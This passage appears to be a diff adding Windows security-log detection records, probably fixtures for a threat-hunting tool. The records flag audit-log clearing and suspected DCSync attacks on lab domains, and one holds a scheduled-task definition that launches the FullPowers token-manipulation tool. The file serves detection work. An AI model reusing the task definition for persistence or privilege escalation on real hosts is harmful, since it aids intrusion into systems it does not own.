+      &lt;RunLevel&gt;LeastPrivilege&lt;/RunLevel&gt; 
+      &lt;RequiredPrivileges&gt; 
+        &lt;Privilege&gt;SeAssignPrimaryTokenPrivilege&lt;/Privilege&gt; 
+        &lt;Privilege&gt;SeAuditPrivilege&lt;/Privilege&gt; 
+        &lt;Privilege&gt;SeChangeNotifyPrivilege&lt;/Privilege&gt; 
+        &lt;Privilege&gt;SeCreateGlobalPrivilege&lt;/Privilege&gt; 
+        &lt;Privilege&gt;SeImpersonatePrivilege&lt;/Privilege&gt; 
+        &lt;Privilege&gt;SeIncreaseQuotaPrivilege&lt;/Privilege&gt; 
+        &lt;Privilege&gt;SeIncreaseWorkingSetPrivilege&lt;/Privilege&gt; 
+      &lt;/RequiredPrivileges&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt; 
+    &lt;StartWhenAvailable&gt;false&lt;/StartWhenAvailable&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;Duration&gt;PT10M&lt;/Duration&gt; 
+      &lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;false&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;DisallowStartOnRemoteAppSession&gt;false&lt;/DisallowStartOnRemoteAppSession&gt; 
+    &lt;UseUnifiedSchedulingEngine&gt;false&lt;/UseUnifiedSchedulingEngine&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;PT72H&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;Author&quot;&gt; 
+    &lt;Exec&gt; 
+      &lt;Command&gt;C:\Users\Public\Tools\TokenManip\FullPowers.exe&lt;/Command&gt; 
+      &lt;Arguments&gt;-t 4932&lt;/Arguments&gt; 
+    &lt;/Exec&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Security
+Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:40:18.084003Z"">
+    </TimeCreated>
+    <EventRecordID>21365</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1228"" ThreadID=""9912"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-482804190-775995292-3801157738-1002</SubjectUserSid>
+      <SubjectUserName>admin</SubjectUserName>
+      <SubjectDomainName>WIND10</SubjectDomainName>
+      <SubjectLogonId>0x47ea55</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",wind10.winlab.local,Security
+Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:07.524202Z"">
+    </TimeCreated>
+    <EventRecordID>452811</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""812"" ThreadID=""3916"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns:auto-ns3=""http://schemas.microsoft.com/win/2004/08/events"" xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1587066498-1489273250-1035260531-1106</SubjectUserSid>
+      <SubjectUserName>user01</SubjectUserName>
+      <SubjectDomainName>EXAMPLE</SubjectDomainName>
+      <SubjectLogonId>0x17dad</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",PC01.example.corp,Security
+Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:11.073626Z"">
+    </TimeCreated>
+    <EventRecordID>198242566</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""744"" ThreadID=""3396"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-1108</SubjectUserSid>
+      <SubjectUserName>bob</SubjectUserName>
+      <SubjectDomainName>insecurebank</SubjectDomainName>
+      <SubjectLogonId>0x8d7099</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.026630Z"">
+    </TimeCreated>
+    <EventRecordID>198242602</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-11-15T08:19:02.298512Z"">
+    </TimeCreated>
+    <EventRecordID>25048</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""748"" ThreadID=""6064"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>alice.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-1005675359-741490361-30848483-1108</SubjectUserSid>
+      <SubjectUserName>bob</SubjectUserName>
+      <SubjectDomainName>insecurebank</SubjectDomainName>
+      <SubjectLogonId>0x1c363a4</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",alice.insecurebank.local,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
+    </TimeCreated>
+    <EventRecordID>198242601</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
+    </TimeCreated>
+    <EventRecordID>198242600</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c